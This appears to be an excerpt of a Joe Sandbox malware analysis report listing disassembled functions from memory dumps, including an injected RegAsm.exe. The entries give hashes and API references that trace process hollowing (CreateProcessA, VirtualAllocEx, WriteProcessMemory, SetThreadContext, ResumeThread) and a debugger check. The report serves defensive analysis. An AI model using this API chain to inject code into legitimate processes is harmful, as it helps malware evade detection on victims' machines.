
[F, xrefs: 02BC1171, 02BC1176
$]q, xrefs: 02BC0FD2

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID:
String ID: $]q$[F
API String ID: 0-3578821254
Opcode ID: 5b479fd68584a7b7cd1b033294c20ccbb1a8bc9695b301354889c8052426775b
Instruction ID: b31d5558d8fa9f03ec23a6c27b7301adc1f762fdf4ab13631fb8a19acc5de8c6
Opcode Fuzzy Hash: 5b479fd68584a7b7cd1b033294c20ccbb1a8bc9695b301354889c8052426775b
Instruction Fuzzy Hash: 7552B074A01259CFDB64DF69C980A8EFBB2FF49311F65C5E9D408AB212D730AA81CF51

Function 02BC0839 Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

[F, xrefs: 02BC1171, 02BC1176
$]q, xrefs: 02BC0FD2

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID:
String ID: $]q$[F
API String ID: 0-3578821254
Opcode ID: 082b3778ab9f6dd5a7219a99ec368b6f9090e95635f3d2219d1636964ed452fc
Instruction ID: 525a2616a8cfc59200e23265e139650a07a4b295479eb45016407e248590e3af
Opcode Fuzzy Hash: 082b3778ab9f6dd5a7219a99ec368b6f9090e95635f3d2219d1636964ed452fc
Instruction Fuzzy Hash: 85B1C074E012298FDB68DF6AC840BDABBB2BF89300F10C4EAD54DA7254DB745A85CF51

Function 02BC28D0 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af96de59141d2f39f3262481035deda203ec36cac6dfda09eeefee3e681a2990
Instruction ID: 81daaa2b811291765c08465486a8772098d79fe00ede71884c734bec34976390
Opcode Fuzzy Hash: af96de59141d2f39f3262481035deda203ec36cac6dfda09eeefee3e681a2990
Instruction Fuzzy Hash: 36428074E01219CFDB24DF69C984B9DBBF2BF48311F6081A9E809A7355D735AA81CF50

Function 02BC28C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c4e2e4ea179beb246a883d3ef299d6b6394e65c6049ba3cb64ac879c7cf5b99
Instruction ID: 39ded73e6ff72a589423318cbb56cf8015b019f75d720a5e191789491ea2c5a0
Opcode Fuzzy Hash: 5c4e2e4ea179beb246a883d3ef299d6b6394e65c6049ba3cb64ac879c7cf5b99
Instruction Fuzzy Hash: B161B375E01218CFDB28CFAAC994BDDBBF2BF88310F6481A9D809A7254D7759941CF50

Function 02BC6374 Relevance: 1.8, APIs: 1, Instructions: 342
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,03C3358C,03C33590,02BC6316,?,?,?,?,?), ref: 02BC66A3

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 372ea18eac5047f929b1b5e47903df0fd2ed1e7b63ffc8aa7ee29b0b4b4024ec
Instruction ID: eac61d2b25d5e016815a43220bd3ef8cb13e290c4505bc36188aef4f68538daf
Opcode Fuzzy Hash: 372ea18eac5047f929b1b5e47903df0fd2ed1e7b63ffc8aa7ee29b0b4b4024ec
Instruction Fuzzy Hash: 90D12570D002298FDB24CFA8C880BEDBBB5FF49304F1095AAD949B7254DB749A85CF95

Function 02BC57CC Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,03C3358C,03C33590,02BC6316,?,?,?,?,?), ref: 02BC66A3

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f6088d51f67005ec86c7ef1756d4b17f6c3afbf43f2e902b193bd25d5cb11bee
Instruction ID: 9a6c751633e68bcbaf3841eabd914d671fe28127e6ab6d5b9509f3aad372ce2a
Opcode Fuzzy Hash: f6088d51f67005ec86c7ef1756d4b17f6c3afbf43f2e902b193bd25d5cb11bee
Instruction Fuzzy Hash: F4D12570D002298FDB24DFA8C880BEDBBB5FF49304F1091AAD949B7254DB749A85CF95

Function 02BC70D0 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02BC71AD

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d42c7b1aa27996ff39d5aaec83fa9f51ec5507cfc80d6f510022a0277a28af23
Instruction ID: 4942e22dc30b8bb63209927fb51831af533962c14384b92529c76fe0755e547e
Opcode Fuzzy Hash: d42c7b1aa27996ff39d5aaec83fa9f51ec5507cfc80d6f510022a0277a28af23
Instruction Fuzzy Hash: 0C4197B4D002589FCB10CFA9D984AEEFBF5BB09310F24906AE818B7210D374A985CF64

Function 02BC583C Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02BC71AD

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a2982eacd33a4961c539c37bca9c8638a7b619dc12876c4e7a58f35f17a2fdf2
Instruction ID: 2af1656f45b7119d20406d9d658b0ad894b1fe4e6c8ac564cce5c912a1e90a68
Opcode Fuzzy Hash: a2982eacd33a4961c539c37bca9c8638a7b619dc12876c4e7a58f35f17a2fdf2
Instruction Fuzzy Hash: B44178B5D002589FCB10CFA9D984AAEFBF5BB09310F24906AE818B7314D775A985CF64

Function 02BC580C Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(00000004,?,02BC6AFB,?,?), ref: 02BC6BDC

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5dabfb76eda724ff68660d970cd8e395aa97e6551f15270c5b6de7213fcaec4c
Instruction ID: 154a2d7a43a054c3c76f70efb8b4db4c13ae52a3d519cf49a2bca459978f0e63
Opcode Fuzzy Hash: 5dabfb76eda724ff68660d970cd8e395aa97e6551f15270c5b6de7213fcaec4c
Instruction Fuzzy Hash: 5C4198B9D002589FCB10CFA9D984ADEFBF5FB19310F20906AE818B7210D335A941CF64

Function 02BC6B20 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(00000004,?,02BC6AFB,?,?), ref: 02BC6BDC

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5c1feb9c3c5acdd709e8e94678009a8d8eb93168c1657eb3db015b9451d3f35a
Instruction ID: 205258060013b1d4326577a90b2c29ca7676ec89e5a3d9a26473dfedb8280f03
Opcode Fuzzy Hash: 5c1feb9c3c5acdd709e8e94678009a8d8eb93168c1657eb3db015b9451d3f35a
Instruction Fuzzy Hash: 794198B9D002589FCF10CFA9D984ADEFBB5FB5A310F20906AE818B7210D335A945CF64

Function 02BC5824 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02BC6DDC

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b950a797fb11554d8dca4065a72025f5027d1aa271b929b7542e8f20e8d9ec98
Instruction ID: 0f990e5225798173696a91e494be637d1bab4483b1e9dcb650444b7efa88341d
Opcode Fuzzy Hash: b950a797fb11554d8dca4065a72025f5027d1aa271b929b7542e8f20e8d9ec98
Instruction Fuzzy Hash: E94165B9D002589FCF10CFA9D984A9EFBB5FB59310F20906AE818BB210D735A941CB64

Function 02BC6D28 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02BC6DDC

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bfe2d71ad7cec193e0e7a4f33d2bc8763150dad3e7557984c42459561316470e
Instruction ID: 84a0bce9d2903fa37ca2bb860f3435dc7c73f00cdb7e35e9ff1a05ec830b4c20
Opcode Fuzzy Hash: bfe2d71ad7cec193e0e7a4f33d2bc8763150dad3e7557984c42459561316470e
Instruction Fuzzy Hash: B44166B9D002589FCB10CFA9D984A9EFBB5FB59310F24906AE818B7210D775A942CF64

Function 02BC5854 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02BC6A49

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 51ace4199fad8ae93d7837dad8a815682395702854642a0c852d2f37b74c4175
Instruction ID: 3b39ef4d7f01c82e7406c5b53305e49933d7f00d75b8a64ed9b48c8693ac392a
Opcode Fuzzy Hash: 51ace4199fad8ae93d7837dad8a815682395702854642a0c852d2f37b74c4175
Instruction Fuzzy Hash: CC419BB4D012589FCB10CFAAD984AEEFBF5FB49314F20906AE418B7210D778A945CF54

Function 02BC6990 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02BC6A49

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 43abb6d07d41c38e5d952ddb93ab2c6a62b0536e386e4a9d0c86cb78c2e874d1
Instruction ID: b1f003e0bb43849832c78b4e479d2b29d780b19f9d9d64843ccd39ac67fc6d00
Opcode Fuzzy Hash: 43abb6d07d41c38e5d952ddb93ab2c6a62b0536e386e4a9d0c86cb78c2e874d1
Instruction Fuzzy Hash: 5C4199B5D012589FCB10CFAAD984AEEFBF4FB49314F24806AE418B7250D778A945CF64

Function 02BC57E4 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02BC6A49

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a2a3496d1534b4f6653eec181ba00d9b5aca9712b985d626adb1125b1c682949
Instruction ID: ac646bf9d4cd7859f42d50ab49109d35184181d19ec2fad5f9a74aea52372eb1
Opcode Fuzzy Hash: a2a3496d1534b4f6653eec181ba00d9b5aca9712b985d626adb1125b1c682949
Instruction Fuzzy Hash: AA419BB5D052589FCB10CFAAD984AEEFBF4FB49314F20906AE418B7210D778A945CF54

Function 02BC1BD1 Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02BC1C7F

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9a47976435c9d37058ddeb62f85ef11f66ad9848e92d2978ed51e9afddce4225
Instruction ID: 001c71dcac1d6a758a934728e490c64c2c81e6524564e3fb4fa74b94a472d302
Opcode Fuzzy Hash: 9a47976435c9d37058ddeb62f85ef11f66ad9848e92d2978ed51e9afddce4225
Instruction Fuzzy Hash: C73198B9D002589FCB10CFA9D584AEEFBF1BF19310F24906AE818B7210D335A945CF64

Function 02BC1BD8 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02BC1C7F

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ef25228c7cf391bc55fd7a3845b893958816323263862afacb9a29772c7cb764
Instruction ID: 45557c64976ef622fe00dd1e0365c9077bcf936ece09c7f986c41c6ae40da875
Opcode Fuzzy Hash: ef25228c7cf391bc55fd7a3845b893958816323263862afacb9a29772c7cb764
Instruction Fuzzy Hash: 973197B9D002589FCB10CFA9D584AEEFBF1BB19310F24906AE818B7210D335A945CFA4

Function 02BC7470 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(00000000), ref: 02BC74F5

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 43681e949027c33b0dee51f856162b3b2397af7756d005e49c1a698e17dfefd4
Instruction ID: 44ddd40706741d251b8607fed3a437aa9b7c570ba4bd5f371c5469cdcd7faa44
Opcode Fuzzy Hash: 43681e949027c33b0dee51f856162b3b2397af7756d005e49c1a698e17dfefd4
Instruction Fuzzy Hash: 5E317BB4D012589FCB10CFA9D584A9EFBF4EF49314F24906AE815B7311D735A941CF54

Function 02BC586C Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(00000000), ref: 02BC74F5

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 355baf8382b821e5f1d9e04bedda0022cd4a92ab1edecb00896dd169eb557cbf
Instruction ID: 6b56856d3899e74fa37dc5f084cf5cc63970d49706b70e18b86c1c4371e119ed
Opcode Fuzzy Hash: 355baf8382b821e5f1d9e04bedda0022cd4a92ab1edecb00896dd169eb557cbf
Instruction Fuzzy Hash: AD31ABB4D012589FCB10DFA9D584A9EFBF4FB09310F24906AE818B7310D735A941CFA4

Analysis Process: RegAsm.exePID: 1436, Parent PID: 1992COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.3%
Total number of Nodes:	29
Total number of Limit Nodes:	4

Executed Functions

Function 06093138 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06093837
$]q, xrefs: 06093867
$]q, xrefs: 0609381A
$]q, xrefs: 0609385B
$]q, xrefs: 06093843
$]q, xrefs: 0609380E

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: fc05fa4428f37644f2f3411c7777b2c0a2ed322ab4ae7cbfcf670ebd9ef37700
Instruction ID: b129c5b5bcc7c85dd2e6b2857e16b02fdbb1f06af97e6383b77343b1df7a9882
Opcode Fuzzy Hash: fc05fa4428f37644f2f3411c7777b2c0a2ed322ab4ae7cbfcf670ebd9ef37700
Instruction Fuzzy Hash: CA323F31E1071A8FCB59EF74C89459DF7B6BF89300F60C6A9D409A7264EB70A985CF90

Function 06097E50 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 060981B3
$]q, xrefs: 060981BF

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 6127e9fa1f10aad78d697ab05236d5dd6e1b8a214f6750bf436d377cacb77438
Instruction ID: 826a8730c759f7819fe1c0c9a39cd04119b83b0d751914f4c5bfe4d6ceb6dcc6
Opcode Fuzzy Hash: 6127e9fa1f10aad78d697ab05236d5dd6e1b8a214f6750bf436d377cacb77438
Instruction Fuzzy Hash: 95029A30B002058FDF98DB68D990AAEBBE7EF85304F14C929D8159B395DB35EC42CB91

Function 06095270 Relevance: 1.8, Strings: 1, Instructions: 594
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 06095969

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: cce7329942e912ae354fee7e00b5d12893f02c7ee9929f4f187bab29c6bf8b5a
Instruction ID: 37a92d187587e72a619e08358f0695f05a6ed313680eac6443f5399fafeab2f1
Opcode Fuzzy Hash: cce7329942e912ae354fee7e00b5d12893f02c7ee9929f4f187bab29c6bf8b5a
Instruction Fuzzy Hash: 0022D131E002059FDFA6DFA5C8906AEBBF3EF84314F108469D41AAB355DA35DD42CBA1

Function 00C77070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00C770E7

Memory Dump Source

Source File: 00000004.00000002.4514338000.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c70000_RegAsm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: e93c98e2e372f30bc0a2de6ad558986ce9f1a72cd8eb12668fcaabf52dfa9457
Instruction ID: ef739549b5eb17ad4097a85e2dc3219a5f647fad1957b29d87e5e7dc7238ac5d
Opcode Fuzzy Hash: e93c98e2e372f30bc0a2de6ad558986ce9f1a72cd8eb12668fcaabf52dfa9457
Instruction Fuzzy Hash: 9F2137B1800259CFCB10CF9AD984BEEFBF4EF49320F14845AE459A3250D778A944CFA1

Function 0609C270 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9755b3880b5ac345036de142b5a22b05832bfdcb4791a32a9765c6cd5a40627d
Instruction ID: 42889c9447f8cc6d4a6a331ae2f964e099f9840712d856dc5438248f06613893
Opcode Fuzzy Hash: 9755b3880b5ac345036de142b5a22b05832bfdcb4791a32a9765c6cd5a40627d
Instruction Fuzzy Hash: E5329D30E402098FEF94DB68D990BADBBB6EB89310F108529D505D7395DB38EC42DBA1

Function 0609B30A Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2a11dbb4a3865a6f893c8a833f9335442273867b4c56b4a4875c7a78d4f3a1
Instruction ID: c3ef36706750346ca3493ed25f4a41044520e4dd0124e2fe13bf4756ef512d64
Opcode Fuzzy Hash: 2b2a11dbb4a3865a6f893c8a833f9335442273867b4c56b4a4875c7a78d4f3a1
Instruction Fuzzy Hash: 8B226270E402098FDFA4DA68E5807AFBBF6EB89320F208925E405D7395DB35DC85DB61

Function 0609ADB0 Relevance: 10.4, Strings: 8, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0609AF24
$]q, xrefs: 0609AEDD
$]q, xrefs: 0609AF5F
$]q, xrefs: 0609AF88
$]q, xrefs: 0609AED1
$]q, xrefs: 0609AF30
$]q, xrefs: 0609AF53
$]q, xrefs: 0609AF7C

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: b6ad5030d5b0a92fc9f88f63dad4b7591213d43e679a3b71195dc0c654880be8
Instruction ID: d206a0b185d6ac9d6bdaaf3d01d7a4da2a4be91d58a5feaf07f01b80d5df4490
Opcode Fuzzy Hash: b6ad5030d5b0a92fc9f88f63dad4b7591213d43e679a3b71195dc0c654880be8
Instruction Fuzzy Hash: 8FE15C30F402098FDFA8DBA8D5906AEBBF6EF85314F208529D4099B355EB35DC46CB91

Function 0609B730 Relevance: 8.0, Strings: 6, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0609BCA3
$]q, xrefs: 0609BC63
$]q, xrefs: 0609BC6F
$]q, xrefs: 0609BCCB
$]q, xrefs: 0609BC97
$]q, xrefs: 0609BCD7

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: fca3e560cc52143d3c832304aab52294acce8f49c8c73410a0ad57295b97735c
Instruction ID: 4d8081838a6bc2fda0ee896e0d5c01c8aa02b9ee805386dfdd36d2f4f972de63
Opcode Fuzzy Hash: fca3e560cc52143d3c832304aab52294acce8f49c8c73410a0ad57295b97735c
Instruction Fuzzy Hash: E9027E30E402098FDFA4CB68E5907AEBBF6EB85320F10892AD415DB355DB74EC45DBA1

Function 06099220 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06099290
$]q, xrefs: 060992CB
$]q, xrefs: 0609929C
$]q, xrefs: 060992D7

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: c80b897900301286587ce0d0493c4679fd3994e9b27bb3a475333b70aec2941e
Instruction ID: 8727fc717866eb3715fe3a1e66c7cea3e239f3f80a6444c90e2c17e809c7ca16
Opcode Fuzzy Hash: c80b897900301286587ce0d0493c4679fd3994e9b27bb3a475333b70aec2941e
Instruction Fuzzy Hash: 8A916030B4060A8FDF99DF65D850BAEB7F7BF84204F148569C809EB344EA349D469B92

Function 0609D018 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0609D417
$]q, xrefs: 0609D40F
$]q, xrefs: 0609D423

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 199fe2fde2502244955649c11c8c836762e62633472ef8abb87c5cbf3b000628
Instruction ID: 927414f20368e1a0c7bcdba26a0e2db3743a9802cd26be08e289a06409cd8ee3
Opcode Fuzzy Hash: 199fe2fde2502244955649c11c8c836762e62633472ef8abb87c5cbf3b000628
Instruction Fuzzy Hash: F0625C30A406098FCB59EF68E590E5DB7F6FF85304B20CA28D0159B269EB75EC46CB91

Function 06094840 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPbq, xrefs: 06094991
fbq, xrefs: 0609486B
\Obq, xrefs: 06094A1B

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq
API String ID: 0-4057264190
Opcode ID: 15f4d066f6fa40e4cf859e777e3af99447752a89f95fe61748c1cf68825f0858
Instruction ID: 4c64065b8b5563f795beacbd9b93e4649bd88fbe4b6d5dc730eb16042c414c5a
Opcode Fuzzy Hash: 15f4d066f6fa40e4cf859e777e3af99447752a89f95fe61748c1cf68825f0858
Instruction Fuzzy Hash: 96616030F402099FEF549FA5C854BAEBBF6FB88300F208529E505EB395DB758D429B91

Function 06099211 Relevance: 2.7, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06099290
$]q, xrefs: 060992CB

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 4a51a4ed6ac1e7f4a8c65d43b59046b1b392eb9b95b8686a7fa5c2347fe4883c
Instruction ID: 0c81e3c3e53c6cf4c0e51bc280950c764621e4975b1ba5dc304492234fa26d67
Opcode Fuzzy Hash: 4a51a4ed6ac1e7f4a8c65d43b59046b1b392eb9b95b8686a7fa5c2347fe4883c
